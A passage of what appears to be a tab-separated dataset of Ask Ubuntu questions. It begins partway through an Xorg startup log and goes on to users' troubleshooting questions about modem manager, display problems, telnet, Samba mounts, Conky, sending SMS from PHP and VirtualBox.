//wiki.x.org to make sure that you have the latest version . [ 49.489 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 49.489 ] ( == ) log file : `` /var/log/xorg.1.log '' , time : fri dec 27 08:06:06 2013 [ 49.489 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 49.489 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 49.489 ] ( == ) serverlayout `` layout '' [ 49.489 ] ( ** ) | -- > screen `` intel '' ( 0 ) [ 49.489 ] ( ** ) | | -- > monitor `` monitor0 '' [ 49.490 ] ( ** ) | | -- > device `` intel '' [ 49.490 ] ( ** ) | -- > input device `` keyboard0 '' [ 49.490 ] ( ** ) | -- > input device `` mouse0 '' [ 49.490 ] ( == ) automatically adding devices [ 49.490 ] ( == ) automatically enabling devices [ 49.490 ] ( == ) automatically adding gpu devices [ 49.490 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 49.490 ] entry deleted from font path . [ 49.490 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 49.490 ] entry deleted from font path . [ 49.490 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 49.490 ] entry deleted from font path . [ 49.490 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 49.490 ] entry deleted from font path . [ 49.490 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 49.490 ] entry deleted from font path . [ 49.490 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 49.490 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 49.490 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 49.490 ] ( ww ) disabling keyboard0 [ 49.490 ] ( ww ) disabling mouse0 [ 49.490 ] ( ii ) loader magic : 0x7fb86f42cd20 [ 49.490 ] ( ii ) module abi versions : [ 49.490 ] x.org ansi c emulation : 0.4 [ 49.490 ] x.org video driver : 14.1 [ 49.490 ] x.org xinput driver : 19.1 [ 49.490 ] x.org server extension : 7.0 [ 49.490 ] ( ii ) xfree86 : adding drm device ( /dev/dri/card0 ) [ 49.491 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0166:1179 : fa43 rev 9 , mem @ 0xd3000000/4194304 , 0xc0000000/268435456 , i/o @ 0x00005000/64 [ 49.491 ] ( -- ) pci : ( 0:1:0:0 ) 10de:1292:1179 : fa43 rev 161 , mem @ 0xd2000000/16777216 , 0xa0000000/268435456 , 0xb0000000/33554432 , i/o @ 0x00004000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 49.491 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 49.491 ] initializing built-in extension generic event extension [ 49.491 ] initializing built-in extension shape [ 49.491 ] initializing built-in extension mit-shm [ 49.491 ] initializing built-in extension xinputextension [ 49.491 ] initializing built-in extension xtest [ 49.491 ] initializing built-in extension big-requests [ 49.491 ] initializing built-in extension sync [ 49.491 ] initializing built-in extension xkeyboard [ 49.491 ] initializing built-in extension xc-misc [ 49.491 ] initializing built-in extension security [ 49.491 ] initializing built-in extension xinerama [ 49.491 ] initializing built-in extension xfixes [ 49.491 ] initializing built-in extension render [ 49.492 ] initializing built-in extension randr [ 49.492 ] initializing built-in extension composite [ 49.492 ] initializing built-in extension damage [ 49.492 ] initializing built-in extension mit-screen-saver [ 49.492 ] initializing built-in extension double-buffer [ 49.492 ] initializing built-in extension record [ 49.492 ] initializing built-in extension dpms [ 49.492 ] initializing built-in extension x-resource [ 49.493 ] initializing built-in extension xvideo [ 49.493 ] initializing built-in extension xvideo-motioncompensation [ 49.494 ] initializing built-in extension selinux [ 49.494 ] initializing built-in extension xfree86-vidmodeextension [ 49.495 ] initializing built-in extension xfree86-dga [ 49.495 ] initializing built-in extension xfree86-dri [ 49.495 ] initializing built-in extension dri2 [ 49.495 ] ( ii ) `` glx '' will be loaded by default . [ 49.495 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 49.495 ] ( ii ) loadmodule : `` dri2 '' [ 49.495 ] ( ii ) module `` dri2 '' already built-in [ 49.495 ] ( ii ) loadmodule : `` glamoregl '' [ 49.496 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 49.496 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 49.496 ] compiled for 1.14.3 , module version = 0.5.1 [ 49.496 ] abi class : x.org ansi c emulation , version 0.4 [ 49.496 ] ( ii ) loadmodule : `` glx '' [ 49.496 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 49.496 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 49.496 ] compiled for 1.14.3 , module version = 1.0.0 [ 49.496 ] abi class : x.org server extension , version 7.0 [ 49.496 ] ( == ) aiglx enabled [ 49.497 ] loading extension glx [ 49.497 ] ( ii ) loadmodule : `` modesetting '' [ 49.497 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 49.497 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 49.497 ] compiled for 1.14.1 , module version = 0.8.0 [ 49.497 ] module class : x.org video driver [ 49.497 ] abi class : x.org video driver , version 14.1 [ 49.497 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 49.497 ] ( -- ) using vt number 8 [ 49.499 ] ( ii ) modesetting ( 0 ) : using drv /dev/dri/card0 [ 49.499 ] ( ii ) modesetting ( 0 ) : creating default display subsection in screen section `` intel '' for depth/fbbpp 24/32 [ 49.499 ] ( == ) modesetting ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 49.499 ] ( == ) modesetting ( 0 ) : rgb weight 888 [ 49.499 ] ( == ) modesetting ( 0 ) : default visual is truecolor [ 49.499 ] ( ii ) modesetting ( 0 ) : shadowfb : preferred yes , enabled yes [ 49.499 ] ( ii ) modesetting ( 0 ) : output lvds-0 using monitor section monitor0 [ 49.501 ] ( ii ) modesetting ( 0 ) : output vga-0 has no monitor section [ 49.501 ] ( ii ) modesetting ( 0 ) : output hdmi-0 has no monitor section [ 49.501 ] ( ii ) modesetting ( 0 ) : output displayport-0 has no monitor section [ 49.501 ] ( ii ) modesetting ( 0 ) : edid for output lvds-0 [ 49.501 ] ( ii ) modesetting ( 0 ) : manufacturer : lgd model : 39f serial # : 0 [ 49.501 ] ( ii ) modesetting ( 0 ) : year : 2012 week : 0 [ 49.501 ] ( ii ) modesetting ( 0 ) : edid version : 1.3 [ 49.501 ] ( ii ) modesetting ( 0 ) : digital display input [ 49.501 ] ( ii ) modesetting ( 0 ) : max image size [ cm ] : horiz . : 35 vert . : 19 [ 49.501 ] ( ii ) modesetting ( 0 ) : gamma : 2.20 [ 49.501 ] ( ii ) modesetting ( 0 ) : no dpms capabilities specified [ 49.501 ] ( ii ) modesetting ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 49.501 ] ( ii ) modesetting ( 0 ) : first detailed timing is preferred mode [ 49.501 ] ( ii ) modesetting ( 0 ) : redx : 0.578 redy : 0.344 greenx : 0.337 greeny : 0.571 [ 49.501 ] ( ii ) modesetting ( 0 ) : bluex : 0.159 bluey : 0.120 whitex : 0.313 whitey : 0.329 [ 49.501 ] ( ii ) modesetting ( 0 ) : manufacturer 's mask : 0 [ 49.501 ] ( ii ) modesetting ( 0 ) : supported detailed timing : [ 49.501 ] ( ii ) modesetting ( 0 ) : clock : 69.3 mhz image size : 345 x 194 mm [ 49.501 ] ( ii ) modesetting ( 0 ) : h_active : 1366 h_sync : 1398 h_sync_end 1430 h_blank_end 1478 h_border : 0 [ 49.501 ] ( ii ) modesetting ( 0 ) : v_active : 768 v_sync : 770 v_sync_end 774 v_blanking : 782 v_border : 0 [ 49.501 ] ( ii ) modesetting ( 0 ) : lg display [ 49.501 ] ( ii ) modesetting ( 0 ) : lp156wh3-tls2 [ 49.501 ] ( ii ) modesetting ( 0 ) : edid ( in hex ) : [ 49.501 ] ( ii ) modesetting ( 0 ) : 00ffffffffffff0030e49f0300000000 [ 49.501 ] ( ii ) modesetting ( 0 ) : 00160103802313780a05f59458569228 [ 49.501 ] ( ii ) modesetting ( 0 ) : 1e505400000001010101010101010101 [ 49.501 ] ( ii ) modesetting ( 0 ) : 010101010101121b567050000e302020 [ 49.501 ] ( ii ) modesetting ( 0 ) : 240059c2100000190000000000000000 [ 49.501 ] ( ii ) modesetting ( 0 ) : 00000000000000000000000000fe004c [ 49.501 ] ( ii ) modesetting ( 0 ) : 4720446973706c61790a2020000000fe [ 49.501 ] ( ii ) modesetting ( 0 ) : 004c503135365748332d544c533200e2 [ 49.501 ] ( ii ) modesetting ( 0 ) : not using mode `` 1366x768 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 800x600 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 400x300 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 800x600 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 400x300 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 1024x768 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 512x384 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 640x480 '' ( hsync out of range ) [ 49.501 ] ( ii ) modesetting ( 0 ) : not using default mode `` 640x512 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 800x600 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 896x672 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 928x696 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 960x720 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 576x432 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 1360x768 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 680x384 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 1360x768 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 680x384 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 700x525 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 720x450 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 800x512 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 840x525 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 840x525 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 960x540 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 960x600 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : not using default mode `` 1024x768 '' ( hsync out of range ) [ 49.502 ] ( ii ) modesetting ( 0 ) : printing probed modes for output lvds-0 [ 49.502 ] ( ii ) modesetting ( 0 ) : modeline `` 640x480 '' x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz d ) [ 49.502 ] ( ii ) modesetting ( 0 ) : modeline `` 320x240 '' x60.1 12.59 320 328 376 400 240 245 246 262 doublescan -hsync -vsync ( 31.5 khz d ) [ 49.503 ] ( ii ) modesetting ( 0 ) : edid for output vga-0 [ 49.503 ] ( ii ) modesetting ( 0 ) : edid for output hdmi-0 [ 49.503 ] ( ii ) modesetting ( 0 ) : edid for output displayport-0 [ 49.503 ] ( ii ) modesetting ( 0 ) : output lvds-0 connected [ 49.503 ] ( ii ) modesetting ( 0 ) : output vga-0 disconnected [ 49.503 ] ( ii ) modesetting ( 0 ) : output hdmi-0 disconnected [ 49.503 ] ( ii ) modesetting ( 0 ) : output displayport-0 disconnected [ 49.503 ] ( ii ) modesetting ( 0 ) : using exact sizes for initial modes [ 49.503 ] ( ii ) modesetting ( 0 ) : output lvds-0 using initial mode 640x480 [ 49.503 ] ( ii ) modesetting ( 0 ) : using default gamma of ( 1.0 , 1.0 , 1.0 ) unless otherwise stated . [ 49.503 ] ( == ) modesetting ( 0 ) : dpi set to ( 96 , 96 ) [ 49.503 ] ( ii ) loading sub module `` fb '' [ 49.503 ] ( ii ) loadmodule : `` fb '' [ 49.503 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 49.503 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 49.503 ] compiled for 1.14.3 , module version = 1.0.0 [ 49.503 ] abi class : x.org ansi c emulation , version 0.4 [ 49.503 ] ( ii ) loading sub module `` shadow '' [ 49.503 ] ( ii ) loadmodule : `` shadow '' [ 49.504 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 49.504 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 49.504 ] compiled for 1.14.3 , module version = 1.1.0 [ 49.504 ] abi class : x.org ansi c emulation , version 0.4 [ 49.504 ] ( == ) depth 24 pixmap format is 32 bpp [ 49.504 ] ( == ) modesetting ( 0 ) : backing store disabled [ 49.504 ] ( == ) modesetting ( 0 ) : silken mouse enabled [ 49.504 ] ( ii ) modesetting ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 49.504 ] ( ** ) modesetting ( 0 ) : dpms enabled [ 50.332 ] ( -- ) randr disabled [ 50.334 ] ( ii ) selinux : disabled on system [ 50.335 ] ( ii ) aiglx : screen 0 is not dri2 capable [ 50.335 ] ( ii ) aiglx : screen 0 is not dri capable [ 50.341 ] ( ii ) aiglx : loaded and initialized swrast [ 50.341 ] ( ii ) glx : initialized driswrast gl provider for screen 0 [ 50.342 ] ( ii ) modesetting ( 0 ) : damage tracking initialized [ 50.342 ] ( ii ) modesetting ( 0 ) : setting screen physical size to 169 x 127 [ 50.347 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 50.348 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 50.348 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 50.348 ] ( ii ) loadmodule : `` evdev '' [ 50.348 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 50.348 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 50.348 ] compiled for 1.14.1 , module version = 2.7.3 [ 50.348 ] module class : x.org xinput driver [ 50.348 ] abi class : x.org xinput driver , version 19.1 [ 50.348 ] ( ii ) using input driver 'evdev ' for 'power button' [ 50.348 ] ( ** ) power button : always reports core events [ 50.348 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 50.348 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 50.348 ] ( -- ) evdev : power button : found keys [ 50.348 ] ( ii ) evdev : power button : configuring as keyboard [ 50.348 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input2/event2 '' [ 50.348 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 50.348 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 50.348 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 50.348 ] ( ** ) option `` xkb_layout '' `` fr '' [ 50.350 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-1ca37fd61409d6c1edb80880df2db1a574556a6a.xkm [ 50.350 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event6 ) [ 50.350 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 50.350 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 50.350 ] ( ** ) video bus : always reports core events [ 50.350 ] ( ** ) evdev : video bus : device : `` /dev/input/event6 '' [ 50.350 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 50.350 ] ( -- ) evdev : video bus : found keys [ 50.350 ] ( ii ) evdev : video bus : configuring as keyboard [ 50.350 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:01/input/input6/event6 '' [ 50.350 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 50.350 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 50.351 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 50.351 ] ( ** ) option `` xkb_layout '' `` fr '' [ 50.351 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 50.351 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 50.351 ] ( ii ) using input driver 'evdev ' for 'power button' [ 50.351 ] ( ** ) power button : always reports core events [ 50.351 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 50.351 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 50.351 ] ( -- ) evdev : power button : found keys [ 50.351 ] ( ii ) evdev : power button : configuring as keyboard [ 50.351 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/pnp0c0c:00/input/input0/event0 '' [ 50.351 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 8 ) [ 50.351 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 50.351 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 50.351 ] ( ** ) option `` xkb_layout '' `` fr '' [ 50.351 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event5 ) [ 50.351 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 50.351 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 50.351 ] ( ** ) video bus : always reports core events [ 50.351 ] ( ** ) evdev : video bus : device : `` /dev/input/event5 '' [ 50.351 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 50.351 ] ( -- ) evdev : video bus : found keys [ 50.351 ] ( ii ) evdev : video bus : configuring as keyboard [ 50.351 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/device:38/lnxvideo:00/input/input5/event5 '' [ 50.351 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 9 ) [ 50.351 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 50.351 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 50.351 ] ( ** ) option `` xkb_layout '' `` fr '' [ 50.351 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event1 ) [ 50.351 ] ( ii ) no input driver specified , ignoring this device . [ 50.351 ] ( ii ) this device may have been added with another device file . [ 50.352 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 50.352 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 50.352 ] ( ii ) config/udev : adding input device toshiba web camera - hd ( /dev/input/event4 ) [ 50.352 ] ( ** ) toshiba web camera - hd : applying inputclass `` evdev keyboard catchall '' [ 50.352 ] ( ii ) using input driver 'evdev ' for 'toshiba web camera - hd' [ 50.352 ] ( ** ) toshiba web camera - hd : always reports core events [ 50.352 ] ( ** ) evdev : toshiba web camera - hd : device : `` /dev/input/event4 '' [ 50.352 ] ( -- ) evdev : toshiba web camera - hd : vendor 0x4ca product 0x7018 [ 50.352 ] ( -- ) evdev : toshiba web camera - hd : found keys [ 50.352 ] ( ii ) evdev : toshiba web camera - hd : configuring as keyboard [ 50.352 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3/1-1.3:1.0/input/input4/event4 '' [ 50.352 ] ( ii ) xinput : adding extended input device `` toshiba web camera - hd '' ( type : keyboard , id 10 ) [ 50.352 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 50.352 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 50.352 ] ( ** ) option `` xkb_layout '' `` fr '' [ 50.352 ] ( ii ) config/udev : adding input device hda intel pch mic ( /dev/input/event10 ) [ 50.352 ] ( ii ) no input driver specified , ignoring this device . [ 50.352 ] ( ii ) this device may have been added with another device file . [ 50.352 ] ( ii ) config/udev : adding input device hda intel pch hdmi/dp , pcm=3 ( /dev/input/event8 ) [ 50.352 ] ( ii ) no input driver specified , ignoring this device . [ 50.352 ] ( ii ) this device may have been added with another device file . [ 50.352 ] ( ii ) config/udev : adding input device hda intel pch headphone ( /dev/input/event9 ) [ 50.352 ] ( ii ) no input driver specified , ignoring this device . [ 50.352 ] ( ii ) this device may have been added with another device file . [ 50.352 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event3 ) [ 50.352 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 50.352 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 50.352 ] ( ** ) at translated set 2 keyboard : always reports core events [ 50.352 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event3 '' [ 50.352 ] ( -- ) evdev : at translated set 2 keyboard : vendor 0x1 product 0x1 [ 50.352 ] ( -- ) evdev : at translated set 2 keyboard : found keys [ 50.352 ] ( ii ) evdev : at translated set 2 keyboard : configuring as keyboard [ 50.353 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input3/event3 '' [ 50.353 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 11 ) [ 50.353 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 50.353 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 50.353 ] ( ** ) option `` xkb_layout '' `` fr '' [ 50.353 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/event7 ) [ 50.353 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpad catchall '' [ 50.353 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catchall '' [ 50.353 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` default clickpad buttons '' [ 50.353 ] ( ii ) loadmodule : `` synaptics '' [ 50.353 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 50.353 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 50.353 ] compiled for 1.14.2 , module version = 1.7.1 [ 50.353 ] module class : x.org xinput driver [ 50.353 ] abi class : x.org xinput driver , version 19.1 [ 50.353 ] ( ii ) using input driver 'synaptics ' for 'synps/2 synaptics touchpad' [ 50.353 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 50.353 ] ( ** ) option `` device '' `` /dev/input/event7 '' [ 50.372 ] ( ii ) synaptics : synps/2 synaptics touchpad : found clickpad property [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : x-axis range 1472 - 5658 ( res 41 ) [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : y-axis range 1408 - 4692 ( res 54 ) [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : pressure range 0 - 255 [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : finger width range 0 - 15 [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left double triple [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : vendor 0x2 product 0x7 [ 50.372 ] ( ** ) option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' [ 50.372 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 50.372 ] ( ** ) synps/2 synaptics touchpad : always reports core events [ 50.384 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio4/input/input7/event7 '' [ 50.384 ] ( ii ) xinput : adding extended input device `` synps/2 synaptics touchpad '' ( type : touchpad , id 12 ) [ 50.384 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) minspeed is now constant deceleration 2.5 [ 50.384 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) maxspeed is now 1.75 [ 50.384 ] ( ** ) synaptics : synps/2 synaptics touchpad : ( accel ) accelfactor is now 0.038 [ 50.384 ] ( ** ) synps/2 synaptics touchpad : ( accel ) keeping acceleration scheme 1 [ 50.384 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration profile 1 [ 50.384 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration factor : 2.000 [ 50.384 ] ( ** ) synps/2 synaptics touchpad : ( accel ) acceleration threshold : 4 [ 50.384 ] ( -- ) synaptics : synps/2 synaptics touchpad : touchpad found [ 50.384 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/mouse0 ) [ 50.384 ] ( ** ) synps/2 synaptics touchpad : ignoring device from inputclass `` touchpad ignore duplicates '' [ 50.450 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-1ca37fd61409d6c1edb80880df2db1a574556a6a.xkm [ 50.453 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-06857493a005679c6e1bb29f32e14dbdfe415ba8.xkm [ 50.560 ] ( ii ) unloadmodule : `` synaptics '' [ 50.560 ] ( ii ) evdev : at translated set 2 keyboard : close [ 50.560 ] ( ii ) unloadmodule : `` evdev '' [ 50.560 ] ( ii ) evdev : toshiba web camera - hd : close [ 50.560 ] ( ii ) unloadmodule : `` evdev '' [ 50.560 ] ( ii ) evdev : video bus : close [ 50.560 ] ( ii ) unloadmodule : `` evdev '' [ 50.560 ] ( ii ) evdev : power button : close [ 50.560 ] ( ii ) unloadmodule : `` evdev '' [ 50.560 ] ( ii ) evdev : video bus : close [ 50.560 ] ( ii ) unloadmodule : `` evdev '' [ 50.560 ] ( ii ) evdev : power button : close [ 50.560 ] ( ii ) unloadmodule : `` evdev '' [ 51.140 ] ( ee ) server terminated successfully ( 0 ) . closing log file .
395845	problem while upgrading modem manager ubuntu 12.04	i am having a problem with mobile broadband , it frequently disconnects about every 2-3 seconds . there was not any updates available in the synaptic package manager . i downloaded the source from this link ( ver . 0.7 . ) http : //ftp.gnome.org/pub/gnome/sources/modemmanager/ and then tried to install according to instructions given , configure make , the install was done , but modem manager is not working . when i type command modem-manager in the terminal , it asks to install modem-manager . is there anything i am missing . i do n't know what to do next . can somebody provide me the .deb package for 12.04.3 lts x64 version , so that i can install the same with just one click , with gdebi . thanks in advance .
395846	windows appear without panel	in the setting , the window manager is not accessible when i open files , and close bouttons for reuduire are absent and the window can not be move but immediately put the top corner of my screen ... can you help me please ?
395854	ubuntu problems in 12.04 and 13.10 on the sony vaio fit	i got this sony vaio fit svf15a1c5e and i am now trying to get one of these ubuntu releases to work . first off with ubuntu 13.10 its graphics card did not work . it worked with 13.10 until i got a black screen and started of with ubuntu 12.04 and the sound did not work . i did everything i could find on google , ask ubuntu , ubuntu wiki , and so on . i got a couple of total freezes with the only thing working was force shutdown . i updated the kernel to get it to work then i got another black screen and now back also on 13.10 . my question is : which problem is easier to solve and how ?
395859	telnet timing out on port 22 and port 23	hello all so here is what i 've done so far ... i have turned off my firewall temporally on both client and server , so does my router . my router has port forwarding on both ports 22 and 23 pointing to my host ( lets say 192.168.1.54 ) my computer is on a different network all together . i 'm trying to connect to my server using telnet from my ip address 174.x.x.233 and my url url.com neither have worked for some reason . the commands i am using to connect are telnet 174.x.x.233 22 and telnet 174.x.x.233 23 in my mind i have covered every base but maybe one of you will see something different thank you mb
395860	mounted samba share hangs /media and df -h when cable disconnected	encountered behavior : unplugging an ethernet cable on which a samba share has been mounted will cause : a. the /media to become inaccessible . b. df -h to hang indefinitely why does this occur on ( l ) unix . is there no auto dismounting execution ? is there any way to resolve automatically on event of cable disconnection , as provided by a software package , configuration or execution of commands , without having to executed a unmount before removing the cable ? is there a way to resolve the inaccessibility after it has occurred other than restarting the system ?
395861	how to fix : conky disappears after click on desktop or other window ?	how to make conky window stay visible after changing the focus , but with desktop icons visible as well ?
395863	how can send a chinese language sms using gsmsendsms via gsm on ubuntu 13.10 in php ?	i am trying to send a chinese characters sms via gsm usb modem on ubuntu 13.10 q1 : here is my code : < ? php echo system ( `` gsmsendsms -d /dev/ttyacm7 -b 115200 13330925583 '你怎么样？ ' '' ) ; ? > < br > then , sending is successed ! but the characters is breaked . how can send utf8 characters clearly ? q2 : i am using gsm usb modem 8 port . i.e . ttyacm0 - ttyacm7 i found a code : $ fp=fopen ( 'com6 ' , '+r ' ) ; < br > fputs ( $ this- > fp , `` at\r '' ) ; < br > ... .. so , is it possible : $ fp=fopen ( 'ttyacm7 ' , '+r ' ) ; < br > fputs ( $ this- > fp , `` at\r '' ) ; < br > ... . please help me .
395864	tailing only updated line of file	i want to tail only the updated line of the file not entire content tail -f /path to file displays all the line from the file . i need to display only the new lines added to the file can anyone help me in this ? regards chhaya
395870	ubuntu installation error using vitual box	i am trying to install ubuntu 12.04 using virtual box , after the installation is complete and when i click on the restart button it give 's me a error message that state 's virtual machine stopped working . but i am also using win xp in virtual box with out any problem
